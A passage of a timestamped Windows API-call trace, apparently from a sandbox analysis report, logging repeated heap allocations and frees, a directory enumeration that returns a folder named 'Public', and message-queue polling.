ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x498) returned 0x336f4d0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee70 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee48 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee20 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fedf8 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fedd0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feda8 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed80 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed58 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed30 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed08 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feb78 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feba0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff078 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff0a0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff0c8 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff0f0 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff118 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff140 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff168 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff190 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3b66078 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3b660b0 [0200.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3b660e8 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb8 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fec90 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fec68 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fec40 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fec18 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32febf0 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32febc8 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fee98 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feec0 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feee8 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fef10 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fef38 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fef60 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fef88 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fefb0 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fefd8 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff000 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff028 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff050 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fece0 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92c8 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cedc8 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0250 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310a28 | out: hHeap=0x2c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0288 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0200.712] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0200.712] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.712] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4558 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4c10 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4580 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4cd8 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceca8 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4e68 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4e90 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3314d10 | out: hHeap=0x2c0000) returned 1 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.714] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.717] 